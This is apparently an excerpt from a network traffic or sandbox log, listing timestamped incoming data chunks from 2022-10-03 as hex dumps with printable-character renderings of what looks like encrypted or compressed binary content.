2022-10-03 14:13:31 UTC	58	IN	Data Raw: 5a 5e af 24 4d d0 11 c0 5d 1c 15 21 82 8f d0 68 f7 a6 1a 5e 41 c4 6e 6f 99 3f e2 3e 8e eb 11 2d 3d c1 cf 76 9d ba f0 4e 69 67 7f 21 a3 6a 7f 0b 12 84 52 53 53 64 88 cd 24 a8 38 28 ec 87 18 90 33 03 0c 36 e6 bd 33 0b f9 2a 0e 4a 03 cb d2 a0 c5 af 4c 96 59 a0 64 35 b7 31 d7 68 45 33 a1 49 3b 0a 16 f4 9f 3b 50 cd 84 cf 51 40 8e 99 af 77 db 37 8b 4b 24 f5 0f 93 9f 2e e5 5d 46 01 15 c8 16 94 7e 3d 46 bd 58 4a 05 cd 4e 22 6e c5 48 08 64 72 92 de f2 77 40 7a 0b 4e f2 6a bd 5c 66 0e 20 04 51 10 0d 7c 41 33 c7 7a bf 29 6d 44 34 1f 31 a2 ba e4 00 e8 89 81 05 f3 89 af 4b ac 2d 22 c6 ae 43 eb 80 e8 b4 d1 4c 89 ca 6f 3c 73 1e 73 52 03 4e 1d 2c 0e 64 a6 e0 70 1b 09 76 6f 7c af a9 18 b5 c1 f3 ff 6f e9 66 c3 51 fd 65 37 6c 55 96 71 94 e3 ca de f2 7d 19 4c 50 fe b9 18 93 Data Ascii: Z^$M]!h^Ano?>-=vNig!jRSSd$8(363*JLYd51hE3I;;PQ@w7K$.]F~=FXJN"nHdrw@zNj\f Q\|A3z)mD41K-"CLo<ssRN,dpvo\|ofQe7lUq}LP
2022-10-03 14:13:31 UTC	60	IN	Data Raw: 54 8e e7 5f 1f 47 17 ec 7c 5c 96 6e 95 99 37 8e 80 14 d4 86 96 df dd c9 f2 9a d8 c3 27 48 08 7c b7 24 0c 9f 9e 72 c4 c6 68 90 29 d8 ec 0e 11 1a 9c 1a e2 b4 2e 10 a5 e9 35 29 64 6e 12 da 6a 10 b4 41 95 8f 57 64 dc c4 0c 44 04 6c 19 2c 68 cb 53 99 b1 df 94 40 26 2f 42 70 66 05 a4 1a 45 e1 d6 b8 3c 81 63 c1 5a cb bf c7 a4 2e 74 23 99 19 df 2f ed d6 b0 21 02 7e 89 b4 1a 98 f8 4e 61 17 5a 51 d9 95 a4 8b 57 02 a2 c1 70 c5 06 78 31 02 b0 17 de 8c 59 96 06 08 c0 05 32 f9 96 02 95 6b 84 19 e5 eb 5d 7f 5b 90 13 4d 9d 75 41 3b 50 79 bf 78 9f 1b be eb 85 3e 91 fb 04 07 b8 d6 a1 cb 35 1d 6b 13 e1 e1 d2 c1 24 bd ca a1 57 09 c2 93 d5 91 bf 97 5a 4a 7e 3a dd 75 1c 61 2c 4f 42 3c 1d b0 c2 a9 1c 39 4c 54 2d ec 00 a0 d6 ed b6 f5 ff 01 38 96 0c f7 f0 65 12 91 68 ea ad 3f ef Data Ascii: T_G\|\n7'H\|$rh).5)dnjAWdDl,hS@&/BpfE<cZ.t#/!~NaZQWpx1Y2k][MuA;Pyx>5k$WZJ~:ua,OB<9LT-8eh?
2022-10-03 14:13:31 UTC	61	IN	Data Raw: 5e f6 a9 d8 e6 5c 3a dd f9 fa 6d 29 7c 7a be 30 54 fc ac 38 02 49 4a a2 f0 63 a6 6e 43 cf 2e 87 fa 34 20 16 94 8d 3e 91 76 ba 86 31 6e 73 0f 03 8a ac 9c 37 4b 6d 62 bf 29 4b bf 5f de 44 e6 3c 3e 91 8d ad 55 d5 a6 1e 41 6e 62 6e 6f 93 26 d0 19 80 eb 06 5e 66 3e ce 5e a2 8d 88 54 6e 4f 58 af 14 7a c6 f4 c9 93 8e d8 4a 52 8b cc 2f cf 68 24 ec 92 3d b8 3a fd 0b 32 d4 ab 31 7a 82 c3 0f 4e 1e 17 e9 92 d5 aa 55 e3 09 ac 64 20 92 15 2a 69 6f 15 9a 4b 40 1b 78 1c 9a 28 53 d8 a8 eb 41 4d 88 f6 e1 69 d2 cd a2 5c 16 f7 72 a2 bd 2e e1 5f 5d e5 14 c8 07 84 5e 15 6d ec 5c 34 40 da c3 21 46 f8 4a 1c 76 4e 99 42 f2 7d 25 ba aa 4e f8 66 bd 4b 66 0e 20 67 5a 18 1e 7b 52 25 e1 06 b8 d0 44 7d 3b 0e 33 b6 2c d5 9c c4 77 7e 10 e8 93 8a 76 bd 20 34 15 ad 44 a8 81 b4 f7 d0 4c 94 Data Ascii: ^\:m)\|z0T8IJcnC.4 >v1ns7Kmb)K_D<>UAnbno&^f>^TnOXzJR/h$=:21zNUd *ioK@x(SAMi\r._]^m\4@!FJvNB}%NfKf gZ{R%D};3,w~v 4DL
2022-10-03 14:13:31 UTC	62	IN	Data Raw: b5 93 8f fd b5 c7 3f 60 e9 55 7b 2f 1e cf 61 10 d5 f8 a7 dd 87 d6 47 09 3d 44 27 4b 21 9e e6 dd 3c ae 11 90 86 88 52 f4 fb 5d f4 c4 74 ce 17 97 3b b4 f9 ca b9 7e c4 ec 5f 12 3e 05 ed 50 54 ee 88 95 9e 25 63 85 13 f9 bc 90 9b 97 cb 89 8f ad bf 23 62 2b 72 b2 5b 1b f1 71 76 ee cc 7f ff 23 ea ee 04 56 eb 9c 1a 74 9c 1c 03 b3 e4 36 14 64 69 0f 4b 34 3c b6 53 8f 8b 3f df 22 c5 2a 6b db b9 34 3a 74 40 68 b5 b3 f5 ba 67 d4 29 4c 6a 67 05 a1 5f 06 e3 d5 cf c0 5e 76 e0 58 fd bf c7 bd 13 60 ae a9 19 df 2e 7a fe 87 30 14 7f 7c a8 1c f0 8d b0 60 31 72 4e f8 95 a3 9c b5 03 8e c1 67 c8 06 1d 41 fc a7 3b dc a7 5b bd e5 0c bb 5e b3 f9 87 0d b7 69 86 77 f4 e9 5d 2f 70 90 13 ee 8e 45 52 2d 6b 7c 87 38 fe 1b be fa 82 30 a5 eb fa 01 83 3d a6 ef 1f 37 62 13 e0 df 1f c0 08 b5 Data Ascii: ?`U{/aG=D'K!<R]t;~_>PT%c#b+r[qv#Vt6diK4<S?"*k4:t@hg)Ljg_^vX`.z0\|`1rNgA;[^iw]/pER-k\|80=7b
2022-10-03 14:13:31 UTC	64	IN	Data Raw: a6 80 ed eb b2 a7 89 3b 6e 96 6f d0 a9 ec 1d 72 6b 82 db b1 dd 27 ac 2d 5f 42 22 8f be 15 c4 02 7e c6 0c 0a 80 32 f9 d5 d9 93 cd 35 33 e4 1e 36 c6 40 c2 00 3e 5e ca 8c f3 d1 5a 44 94 26 f8 7d 2b 54 53 be 36 7c de 84 38 08 26 a2 f9 f0 73 d4 46 7d e9 2e 81 85 75 21 22 90 fc 82 92 60 bc ae 12 6e 73 05 bc 62 a1 40 3d 5c 60 50 bc 28 56 f1 1b df aa e2 14 0d 34 8d ab 6c e9 aa 93 7a 01 8a 6e 7c 91 31 f0 3b 95 77 11 28 32 29 52 4b 82 a0 9d c8 79 6f 62 b9 88 61 a1 06 de 0f 95 d6 79 72 14 dd 21 ad 3d b9 fd 9e 08 99 a5 ec 05 04 e1 37 20 78 f2 22 18 d2 05 19 de a0 c0 36 42 95 55 a6 72 b8 ab 24 22 6b 70 3a af 54 4c 39 ee f4 9b 22 5b 50 37 ce 52 97 99 5e 2f 59 d2 c9 8b 6b 17 e8 7b 82 88 2c 6f e2 2d 02 cf e0 f4 82 76 23 1d e2 5b 4a 05 c8 c5 3a 7e 48 78 1c 70 67 a9 47 fa Data Ascii: ;nork'-_B"~2536@>^ZD&}+TS6\|8&sF}.u!"`nsb@=\`P(V4lzn\|1;w(2)RKyobayr!=7 x"6BUr$"kp:TL9"[P7R^/Yk{,o-v#[J:~HxpgG
2022-10-03 14:13:31 UTC	65	IN	Data Raw: 96 c9 23 ae 4e f4 86 6b 21 37 82 89 35 1c 8b 6d 81 ef 50 91 dc d4 d5 b8 b1 68 97 dd c1 02 1a 6a 2b 9f cf db a3 10 3d 69 dc a5 bf 05 27 70 67 d4 2c b9 93 ac 2e b7 93 86 93 96 c5 31 6a ef 7d 33 2c 1e c8 72 08 ea fb 39 db af f5 e5 09 37 42 27 32 23 9e e6 b8 37 f4 12 9a 86 d3 64 f5 fb 51 fe c4 02 ce 17 97 3b a4 f9 ca b9 41 e5 ce 5d 18 5b 86 ce 52 5e 8b 63 bd ba 2c 70 87 30 fe 88 97 f4 38 e3 aa 85 d9 c9 34 11 08 7c b4 53 7c bd 9c 76 e4 c0 40 fe 39 e8 e8 06 11 01 9f 1a 78 9c 0d 01 b3 e8 09 41 46 6b 05 2e 04 1f b4 59 94 89 78 1d 21 c5 26 4e 3b 46 1a 2b 76 1d 71 b5 b3 fe 81 18 e7 2f 39 5a 08 26 a2 30 6d e5 fd ed 1f 80 65 cd 58 e2 bc c7 b1 36 55 23 b1 13 c8 5c 53 d4 b0 3a 7b 56 a0 af 10 99 c7 80 63 3b 5e 41 fa a4 a0 9d af 2b ad c3 67 c4 11 0c 0b fe b1 31 b3 84 59 Data Ascii: #Nk!75mPhj+=i'pg,.1j}3,r97B'2#7dQ;A][R^c,p084\|S\|v@9xAFk.Yx!&N;F+vq/9Z&0meX6U#\S:{Vc;^A+g1Y
2022-10-03 14:13:31 UTC	65	IN	Data Raw: d7 5f 7c 52 ab 44 e1 70 fa 6f 64 0e 20 d6 4e 0b 1a 59 36 23 ca 63 c5 f0 6e 68 33 d0 36 9f 02 eb f3 16 7c 6d 0b cd ad a2 4b b7 fe 3e 29 ab 47 73 89 9c be be 6b 90 c0 78 f1 72 36 54 5f 1c 48 cb 1a 22 53 aa 2f 75 0c 1c 5b 81 f1 9e af 77 93 cb e4 78 b6 e6 43 ea 74 fa 74 3a 69 56 bb ca 16 e3 c0 01 50 7d 1a 70 14 ba b8 1e f6 1d e4 08 00 12 9e 71 5b d7 46 e9 ca 92 fb a1 92 13 63 08 c7 5a f1 0a 71 98 7a 5a cf 70 7c 11 a7 7d 3b 14 4e a9 13 40 b3 8f 7a ec d5 35 26 e4 ab e1 55 d9 d8 c1 df 2c 9b ff 85 06 ac 44 f8 70 4e 07 1f b2 81 1d 3d 9b 78 af f0 73 91 d6 00 c2 da 97 42 10 d6 ae 27 77 4d 23 99 ed 0f af 35 13 57 f4 c9 b6 16 37 70 73 d4 2c b9 5a df 1d b1 bb 0f fd b5 c1 5e 47 eb 55 54 f1 11 eb 52 16 d1 f8 33 ce 90 fe d2 09 3d 5f 8a 10 30 9a c4 57 15 f6 14 ff a7 f9 4a Data Ascii: _\|RDpod NY6#cnh36\|mK>)Gskxr6T_H"S/u[wxCtt:iVP}pq[FcZqzZp\|};N@z5&U,DpN=xsB'wM#5W7ps,Z^GUTR3=_0WJ
2022-10-03 14:13:31 UTC	67	IN	Data Raw: 5b bd ea 0a bb 24 16 f9 92 29 b7 69 87 64 a6 ee 5d 7b 7f 90 13 4d fe 41 43 3b 77 79 bf 78 da 1b be fb 93 35 ba e0 7b 04 af 28 ae e7 37 05 ed 17 e6 f7 23 c0 08 bf f8 aa 57 0f da 6d d4 bd 21 b8 58 61 93 38 a6 57 b7 65 28 65 6f 3e 1e cd c5 a8 1c 3c 66 4a 2f c4 aa 94 d4 ed 90 f5 ff 01 f7 92 0c e6 e9 6e 39 8a 4d ed ba c0 ee 85 a8 ba 34 d6 ff ec d1 cd d1 77 22 4c fc ad 69 ae c2 31 ad 70 97 92 c0 76 45 76 ec f1 3a 21 5c 0c 39 62 87 25 28 b2 33 1c 0e c3 32 5d b9 c9 96 ee b5 39 5c ae 9a d5 26 15 a7 b3 dc 9b 50 ec 36 35 82 5c fc ce 89 f5 75 6e 9f 83 06 a7 4d e4 98 65 32 8a d5 ce a2 14 a0 7c a5 bb 40 46 8c 3e 4c 71 26 25 95 5c a8 de 42 68 15 06 a5 80 58 82 bd c7 88 af 22 8c 72 4d 78 06 24 dd 79 77 6a 91 d0 b9 c6 36 db 3e 57 cc 9a 94 64 3d 18 02 7e cd 1d 0f 94 24 50 Data Ascii: [$)id]{MAC;wyx5{(7#Wm!Xa8We(eo><fJ/n9M4w"Li1pvEv:!\9b%(32]9\&P65\unMe2\|@F>Lq&%\BhX"rMx$ywj6>Wd=~$P
2022-10-03 14:13:31 UTC	68	IN	Data Raw: 4f 58 9d 95 f4 9b 29 4f f6 aa d3 42 47 a2 86 72 4d d2 c9 88 4f 01 f7 74 80 8d 29 ca 59 e2 2b 15 c8 0f aa 62 29 6e e6 49 4d 15 c8 cb 5b 7b c4 49 16 63 6f ac 50 fa 65 43 7a 14 4e f2 66 5e da 64 0e 2b 1b 48 0b 18 59 e1 22 ca 6f bc f9 6b 6e 32 d3 a9 be 2a dd e2 1f 7a 0d 31 e7 9a a8 58 b7 31 34 2a 86 47 95 8b 9c be f9 60 90 c0 78 3e 57 36 17 5c 1c 44 8c 00 20 53 aa e0 7f 0f 31 5b 88 f3 9e af 30 98 cb e4 78 79 c0 4e b5 41 fa 72 5f 57 46 93 f7 07 e9 d8 f6 78 14 1d 58 7e 93 94 1a 99 30 f7 21 22 b5 92 54 75 8e 6b eb c0 8b f9 83 b7 3a 4b 78 1a 5a e6 26 75 c3 7b 50 d8 36 73 68 a4 77 e3 74 46 83 25 4a a2 8f 7b d1 d5 7e 25 e4 a7 17 79 ca dc e3 a3 04 b3 84 e9 21 a8 2b df ac 41 28 26 8e 93 34 1f f6 6e 87 c1 5b bd de de c8 da ba 42 e8 d4 ae 27 77 47 23 99 ed c0 aa 02 12 Data Ascii: OX)OBGrMOt)Y+b)nIM[{IcoPeCzNf^d+HY"okn2z1X14G`x>W6\D S1[0xyNAr_WFxX~0!"Tuk:KxZ&u{P6shwtF%J{~%y!+A(&4n[B'wG#
2022-10-03 14:13:31 UTC	69	IN	Data Raw: e3 d5 e0 1c 80 62 de 40 c8 bf a5 b7 1e 76 8e b1 19 ce 30 57 fe 68 30 14 7f 8a 24 19 9f e9 98 53 3b 58 43 de 8a b9 b5 71 03 8e c9 4f 42 05 7f 2f d4 82 3b dc ad 56 a9 ee 02 b2 36 32 d1 5a 29 b7 6f aa 60 d0 e0 83 50 76 97 7c 46 8f 45 49 23 a2 16 87 7a ff 11 96 3c 92 35 bc ea da 15 8a 00 96 e7 37 0f 73 17 95 ed 2e c0 02 b5 f5 9d 57 0e d0 b3 d4 bb 97 bc 58 60 8d 38 a6 57 1d 61 28 2e 2b 3e 0b e8 e0 a8 1d 26 56 49 2f 98 13 90 d4 46 9e f5 ee 72 2a 94 0c ec ec 68 47 eb 69 ed be e9 03 84 a8 bc ca 94 fc ec d9 e5 3f 76 c6 4e 93 8a 67 ae c8 ef 86 55 bf a5 c0 76 4f 7a 34 c2 3a 21 58 d2 39 64 07 40 29 b2 38 34 e3 c2 17 5b 91 8e 95 ee b3 11 be aa 9a d3 47 32 a5 b3 cd 40 5e c9 11 03 82 5c d3 c3 a1 c3 75 6e 95 5d 2c a4 67 e5 8a 65 32 8a ed cd a2 08 8d 7c ab 9e 65 46 8d 3f Data Ascii: b@v0Wh0$S;XCqOB/;V62Z)o`Pv\|FEI#z<57s.WX`8Wa(.+>&VI/Fr*hGi?vNgUvOz4:!X9d@)84[G2@^\un],ge2\|eF?
2022-10-03 14:13:31 UTC	71	IN	Data Raw: 7b af 1e 4a fb e3 37 6c 5a c8 73 69 fd f6 29 b1 2a 09 e0 87 18 fa 03 fd 0d 1b 98 ca 31 70 e7 f7 1c 42 3c ab c0 aa dc 90 a0 63 b5 52 ba 2a a8 20 d7 7f 78 3d b9 50 2f 70 17 f4 91 f4 5f f4 c1 9d 42 4d 8e 88 a2 68 2e c9 8a 67 46 f7 74 8a d1 2f e1 55 3d 0d 15 c8 28 82 76 28 6c ec 5a 4a aa db c3 25 ad c5 49 1c 1c 67 ba 42 e4 77 4a 52 ab 4e f2 60 d0 58 64 0e 5e 08 4e 1a 02 70 41 22 5a 64 aa d7 62 68 39 0e 39 ba 2a dd e8 26 72 7e 3f e7 9a a2 fa bd 20 2f 27 b3 47 39 88 9c b2 f9 7f 91 c0 74 07 5d 1e 62 55 11 31 b8 2d 22 59 ab f6 7c 35 8e 70 fe f6 b6 9a 18 b4 c3 8b 2d 68 e9 6c cb 6a c7 74 30 70 68 d1 f4 3e 8f cb df 5a 7f 0e 4e 6b b4 93 35 88 2a f7 07 90 df 95 45 77 c9 1d ea c0 87 87 4c a5 13 69 2e 0b 5d f1 0a 71 56 78 5a cf 37 68 13 a7 7d 8a 44 6b 81 2f 51 bc 92 bf Data Ascii: {J7lZsi)1pB<cR x=P/p_BMh.gFt/U=(v(lZJ%IgBwJRN`Xd^NpA"Zdbh99&r~? /'G9t]bU1-"Y\|5p-hljt0ph>ZNk5EwLi.]qVxZ7h}Dk/Q
2022-10-03 14:13:31 UTC	72	IN	Data Raw: b7 b2 ee 0e 38 09 8b 0b 69 a2 38 9c a2 f5 71 86 65 69 0f 4b 54 3d b6 5f 8f 83 57 65 af 9f 20 46 12 74 0e 3a 67 23 44 28 a2 e3 f9 df c4 2d 33 3f 26 04 a0 36 76 ef fd 61 1f 80 65 aa 35 ca bf c1 b1 0f 7a 4c 7f 18 df 25 af da a1 3b 38 72 b3 a4 75 fe ef b0 6a e7 49 5a c5 43 b0 8e b8 10 9f d7 e9 79 39 c3 d7 03 4e e5 d0 b6 52 91 e2 1b b2 4b 52 f9 92 22 6b 78 96 73 12 f9 4c 6a 60 81 01 c3 39 7a 33 c5 87 86 61 6d da 33 88 fa 93 3f a9 ef 77 1a ad 28 aa ea 1f 32 60 13 ec 29 2e c6 22 b6 f7 aa 16 42 da 6d d6 bd bd bc e3 61 9d 38 b3 56 1d 61 f8 64 60 3e 12 cd e0 a8 1c 3d 66 4a 2d c4 13 90 4c ed 9e f5 a8 00 30 96 e3 e7 e6 6e 35 8a 68 ed ba c1 ee 85 a8 ba e2 d2 ac ec df cd 6a 76 c6 48 f2 af 65 ae d7 31 88 70 b2 93 c0 77 5e 46 1a f5 2a 20 52 0c 8a 62 79 30 5b 8f 3d 1c 08 Data Ascii: 8i8qeiKT=_We Ft:g#D(-3?&6vae5zL%;8rujIZCy9NRKR"kxsLj`9z3am3?w(2`)."Bma8Vad`>=fJ-L0n5hjvHe1pw^F* Rby0[=
2022-10-03 14:13:31 UTC	73	IN	Data Raw: ae 12 6e 73 03 6c 7e 8f 9c 33 68 45 50 bd 29 4d f1 1c c3 08 e2 1a 28 92 8d aa 66 c6 a5 1e 17 01 8a 6f c4 99 20 e9 5e 99 e9 00 2a 2f 39 b0 32 8b b8 8f 7c 85 66 7b a9 3c 20 aa 1c ce bb 6a df 62 62 e7 eb 2b b1 21 fb e2 b3 3d b9 39 fd 07 16 df 9c 31 70 e7 f5 0e 48 6a 79 c0 aa d2 82 be 9c 4a ab 4c 74 b9 2c 2f 41 86 3c b9 4d 2f 36 15 f4 91 f6 57 fb a8 e7 42 4d 84 85 8a 5f d2 c9 80 b9 15 f1 5e 8b 82 2e e1 55 32 0b 15 d4 2f 82 78 0c 6e ec 5b 4a 03 eb c3 39 22 c5 47 39 70 66 bb 59 c2 74 4a 0e ab 4e f2 cb d2 58 75 7d 30 0a 4e 10 14 77 3f 4b cb 65 ae ff 81 69 39 08 11 e8 29 dd f5 3e 98 7f 1a e3 f5 85 49 bd 2a e0 36 8a 47 d7 88 9c b2 dd 64 a5 c0 72 25 a0 1e 64 21 75 43 e3 29 0a be a1 f1 73 35 4a 70 fe f6 b6 46 19 b4 cf 8b 55 6a e9 6c 1c 4c df 5c 06 7a 44 99 f0 3e d4 Data Ascii: nsl~3hEP)M(fo ^/92\|f{< jbb+!=91pHjyJLt,/A<M/6WBM_^.U2/xn[J9"G9pfYtJNXu}0Nw?Kei9)>I6Gdr%d!uC)s5JpFUjlL\zD>
2022-10-03 14:13:31 UTC	74	IN	Data Raw: 0f ed 2d cb 64 d3 11 87 f3 c0 a2 50 f9 af 5d 18 5b 86 a9 52 5e 8b 76 80 a6 a3 70 81 38 c4 b8 bc b1 3c cb 83 96 d4 d2 25 73 27 11 f2 5b 13 94 b6 cc ed c6 6e ff e8 e9 ee 04 2a 14 8d 1c 6f b9 41 47 b1 e2 14 1a df 6a 05 22 04 ee b7 59 94 9c 5c 01 1f c4 20 40 00 6c 08 20 61 3b 3d f6 b2 f4 90 7a ce 3c 35 3f 58 04 a0 36 76 ee ba cc 1d 80 69 ed cc c8 bf c1 d8 05 74 23 bb 35 f2 29 59 a0 b2 30 12 64 af c0 13 9e ef ba 48 19 5a 49 d4 bd 5f 9c a9 05 e1 8e 67 ce 0c 57 5e fe b1 3d f4 81 5b bd ef 1b b0 4b 74 fb 92 22 a5 7c af 2c c6 ea 57 41 19 6f ec b2 50 4b 51 2e 86 6f 9f 78 ff 00 d1 9b 93 35 b0 3c 03 28 12 2b a0 e1 1f 36 60 13 ec df 65 c2 08 b5 ce a2 41 1f d2 e3 63 aa 67 af 4e 72 92 00 11 57 1d 61 2e 0a 2a 3c 1e c7 8f e3 1e 3d 6c 59 38 fc 90 90 d4 ed 8c e2 d7 4d 32 96 Data Ascii: -dP][R^vp8<%s'[noAGj"Y\ @l a;=z<5?X6vit#5)Y0dHZI_gW^=[Kt"\|,WAoPKQ.ox5<(+6`eAcgNrWa.<=lY8M2
2022-10-03 14:13:31 UTC	76	IN	Data Raw: ef 2f ed f7 31 ce fc 40 c2 11 05 4c de 87 d1 ce f9 44 9e f2 8e 65 01 53 62 ad 31 6d c8 b4 a8 24 2d b3 b6 e8 f3 88 57 73 cc 24 92 8b 5f 30 16 90 af 1c 98 67 b9 86 ee 6f 73 03 7a 4a 9c 9c 3d 47 53 7e f5 38 47 e9 e0 de 44 e4 02 25 6e 8d ab 77 da 9c 6d 76 00 8a 69 7c 89 31 e8 25 ec a8 01 20 23 2e de 4b 8f d7 b4 55 68 61 6a bf 05 7a 81 b6 c8 93 8e b1 23 65 88 ca 38 a1 03 e3 ef 96 13 e0 7c fc 0d 1c f1 ba 21 1f 23 2a 0e 44 05 1a d6 7c c5 a1 42 96 5b bf 5a 9a 47 d3 d6 6f 62 e3 ac 6e 68 27 17 f4 91 3b 48 ad 9a d3 42 47 85 a0 95 68 d2 c3 54 67 12 dd 35 96 9e 2e e1 55 32 0d 25 c8 0d 82 eb 2b 6e ec 97 48 03 db d6 25 6e c5 6c 1c 70 67 a1 72 f5 77 48 50 ab 4e 45 60 d2 49 17 14 28 08 44 10 36 b6 42 22 cc 4d 98 d6 6c 62 11 3c 3b ba 2c f5 c0 16 76 74 32 2d 99 a2 4d 95 12 Data Ascii: /1@LDeSb1m$-Ws$_0goszJ=GS~8GD%nwmvi\|1% #.KUhajz#e8\|!#*D\|B[ZGobnh';HBGhTg5.U2%+nH%nlpgrwHPNE`I(D6B"Mlb<;,vt2-M
2022-10-03 14:13:31 UTC	77	IN	Data Raw: bf 05 27 49 41 fc 1f b3 84 d5 1b da da 8c fc bf d4 37 48 23 54 5e 25 0f c8 52 f7 d2 f8 3f b2 ba d4 e5 03 49 59 54 10 3a f1 27 d6 14 fc 01 9b 91 fd 62 2e f8 57 f0 83 10 cf 17 9b 67 8b f9 ca a8 45 91 fd 59 30 88 ea ed 56 31 bc 67 95 94 5b 7c 81 38 cd be 9c e6 36 da 81 0b 6e d4 f9 4a 2d 7e b4 72 02 99 8f 7e c6 61 69 90 3c fb e7 7d 04 1b 9c 1c 6d be 3f 0b a2 e7 36 97 65 69 03 4b 28 3d b6 5f 8f 85 41 79 4d fa 21 46 15 76 13 3a 79 5a 13 b4 b3 f2 87 61 ed f7 3a 50 61 6a e5 31 67 e5 0b c9 34 b6 63 c5 7a e3 88 c7 b7 14 a8 23 a0 14 c8 f9 62 db a1 3d 05 7b 2c 18 25 ac 10 4f 9f e5 4d 6c fa a3 a3 9d a3 10 82 b0 7d cc 06 75 22 d4 86 3b dc ad 85 bf e3 20 bc 0e 72 b5 92 28 b7 69 87 64 c2 ea 5d 7b 6a 90 13 4d af 45 43 3b 6c 79 bf 78 da 1b be fb 93 35 ba e0 5b 00 af 28 09 Data Ascii: 'IA7H#T^%R?IYT:'b.WgEY0V1g[\|86nJ-~r~ai<}m?6eiK(=_AyM!Fv:yZa:Paj1g4cz#b={,%OMl}u"; r(id]{jMEC;lyx5[(
2022-10-03 14:13:31 UTC	78	IN	Data Raw: 25 c3 71 47 dd 4c 6e 18 2e 00 86 58 84 a1 c2 a0 5e 04 8c 74 5f 7e 2e d6 de 1d 74 79 95 ad a3 c4 36 a3 31 7f 56 94 94 62 36 3a 6d c3 cd 1d 05 82 14 d3 f3 f1 94 a8 86 ec f7 31 0d fe 78 4e 0b 2d 58 cc 89 f3 5f 5b 44 94 eb fd 78 06 7b 30 bc 36 76 cc a6 29 02 0b a5 a5 fc b4 2d 47 73 cc 3c 8b 92 5f 29 16 90 8e 7c af 77 bc a8 01 66 5b f9 6d 62 ab 8f 34 5c 4f 43 ac 3f 5e ce 24 ee 45 e2 14 1c 82 9c a4 e7 e5 ad 0f 40 29 fc 6d 6f 9f 4f e3 2f 83 e1 2c 0e 56 02 cf 5a 8c ab 83 45 63 4f 0d ad 14 76 81 e0 c9 93 82 b1 2f 64 88 c6 01 c6 29 25 ea be e9 8e 39 fb 62 57 f7 ab 3b 63 e4 13 e6 4e 14 11 d0 a1 df 82 f9 9d 4a a7 0b 3f b8 2c 23 45 77 2c b1 5a 4b 18 3f 5e 9b 28 53 f6 7c d0 42 4b e1 c5 a2 68 d8 a6 c9 66 15 f1 4c 31 9e 2e e1 44 39 1c 10 e0 a7 82 76 23 01 f7 58 4a 09 f7 Data Ascii: %qGLn.X^t_~.ty61Vb6:m1xN-X_[Dx{06v)-Gs<_)\|wf[mb4\OC?^$E@)moO/,VZEcOv/d)%9bW;cNJ?,#Ew,ZK?^(S\|BKhfL1.D9v#XJ
2022-10-03 14:13:31 UTC	79	IN	Data Raw: 3f f7 b3 3f 44 da c3 fc 4c 2c b7 e0 fb 2b b8 de da 34 42 22 31 92 a9 2c 37 88 67 91 87 6d 90 dc de dd dd 80 78 97 c6 bc 3e 03 94 20 b5 ee e9 ac ee c4 9e eb d5 af 17 21 49 56 cd d2 b2 a8 d6 7f af 91 8c f6 bf dd 22 72 e9 44 4c 30 3f 30 7b 0c dd e9 31 d5 e8 95 e4 09 3b 4a 76 03 33 9e fd c5 0b d0 ec 91 ac f1 5b fb ec 81 e5 e1 32 ea 04 83 13 96 eb d5 ae a8 97 c0 55 09 5b fe 77 43 58 9e 7b 86 8c 2f 61 93 2f 28 ac b8 f7 26 d8 9b 85 c8 d1 3c 75 d4 7f 98 48 02 92 f1 7d ef c6 62 88 04 55 ee 0e 39 05 84 09 6c b4 3f 13 ac fb e0 33 48 60 3d ad 96 c3 49 46 84 9c 42 72 33 d7 3f 54 ed 66 35 32 61 3f 44 2f 9b 0c 95 6b c3 3b 11 61 67 05 aa 26 27 d7 2a 3a e3 9f 70 d6 62 cb ae d5 a8 12 88 22 9d 04 ce 28 66 5b ea 30 14 74 b1 a0 0b 90 f9 af 5b a6 49 46 bd a9 a2 9d a3 10 87 dc Data Ascii: ??DL,+4B"1,7gmx> !IV"rDL0?0{1;Jv3[2U[wCX{/a/(&<uH}bU9l?3H`=IFBr3?Tf52a?D/k;ag&'*:pb"(f[0t[IF
2022-10-03 14:13:31 UTC	81	IN	Data Raw: b9 c8 9c 30 b7 3f 7b a2 b0 d5 69 09 a7 b3 c7 9e 50 ec 18 35 82 5c 1c cc 89 f4 93 6c 9f 83 39 a2 4d e4 b3 65 32 8b f6 fb a5 14 2c 7e a5 bb a4 46 8c 2e 3f 6b 24 25 d8 53 80 a6 4c 68 13 69 9c 87 58 88 a1 c3 f6 e7 07 8c 78 41 50 fa 25 dd 1b 7e 14 d9 de b9 cc 1e ad 3f 57 ca fa af 66 3d 37 0f 77 a3 21 0d 94 2e c2 f0 d2 fc 8c 3e ed fd 2a 1b e3 56 d4 19 38 60 cb 85 db e6 4b 52 8f ed 60 7a 0e 7b 7c ba 36 7a ce a3 10 3b 26 a2 a9 d8 6f a4 46 75 e4 d2 80 84 71 09 7b 92 a5 05 ba dc bc ae 18 7d 7f 14 60 0d c1 9e 3d 47 56 57 ad 25 22 ca 1d df 4e 8e 37 0d 92 8d ab 7d f6 b6 5e 10 29 b0 6f 6f 93 97 ef fb 0e f3 00 20 24 2c c3 71 cc a9 9b 45 6f 70 53 c1 16 70 a3 06 12 bc a8 cf 6f 75 83 dd 2e a0 3b b6 c4 cb 17 8f 33 ec 0a 0b e7 bc e7 e3 c5 76 0c 4e 1e 00 c6 bb c6 b2 85 0e 62 Data Ascii: 0?{iP5\l9Me2,~F.?k$%SLhiXxAP%~?Wf=7w!.>*V8`KR`z{\|6z;&oFuq{}`=GVW%"N7}^)oo $,qEopSpou.;3vNb
2022-10-03 14:13:31 UTC	81	IN	Data Raw: bf e5 00 b1 0c 73 fa 92 2e 9f 5b 86 64 ce c2 55 7f 71 96 3b 7e 8e 45 49 28 7c 68 bb 50 c0 1b be f0 be 3e c9 fa 06 00 a5 23 7d 33 37 05 60 3b a6 f4 2c c6 20 8d dc aa 5d 26 d2 69 d4 bb 95 8f 58 61 97 10 f4 57 1d 6b 25 6c 48 37 1a cd e6 80 4f 3f 66 40 07 90 11 90 de 82 cb f7 ff 0b 3c 80 04 f1 3c 7d 32 99 60 c6 c2 c8 c6 8f ac ba e4 fa f4 e8 df cb c0 7f ee 35 fc ad 63 bd c7 38 a0 7c 93 93 c6 5e 48 72 1c f3 2b 29 7a 71 39 62 7f 32 2e bb 14 12 0a c3 11 75 b6 cc 96 e8 a4 31 79 d6 9a d5 2e 06 a0 c0 fa 9f 50 ea 2a 3c 93 55 c8 cb e6 b7 74 6e 99 92 25 b3 4b 8b a9 64 32 8c fc c2 b3 13 c0 3d a4 bb 63 57 85 17 5c 75 26 23 bd 1c a9 de 4a 6e 04 0f 9f 4b 59 82 b8 d6 80 b8 d1 9f 7a 5d 